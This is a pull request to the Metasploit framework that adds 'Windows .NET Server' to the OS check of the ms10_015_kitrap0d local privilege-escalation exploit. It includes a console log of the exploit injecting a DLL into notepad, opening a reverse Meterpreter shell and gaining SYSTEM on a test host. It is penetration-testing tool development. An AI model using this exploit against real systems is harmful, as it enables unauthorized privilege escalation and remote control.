### PR TITLE
Add support for Windows .NET Server in ms10_015_kitrap0d 

### DIFF
--- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb
+++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     # Validate OS version
     winver = sysinfo["OS"]
-    unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows 2008|Windows 7/
+    unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows .NET Server|Windows 2008|Windows 7/
       return Exploit::CheckCode::Safe
     end
 


### PR DESCRIPTION
As seen on #9237 :)

## Verification

```
msf exploit(ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 192.168.1.35:8081 
[*] Launching notepad to host the exploit...
[+] Process 3564 launched.
[*] Reflectively injecting the exploit DLL into 3564...
[*] Injecting exploit into 3564 ...
[*] Exploit injected. Injecting payload into 3564...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (179296 bytes) to 192.168.1.52
[*] Meterpreter session 21 opened (192.168.1.35:8081 -> 192.168.1.52:1036) at 2017-11-23 05:53:18 -0200

meterpreter > getuid
Server username: AUTORIDADE NT\SYSTEM
meterpreter  > sysinfo
Computer        : WIN2K3-SP1-PTBR
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : pt_BR
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > 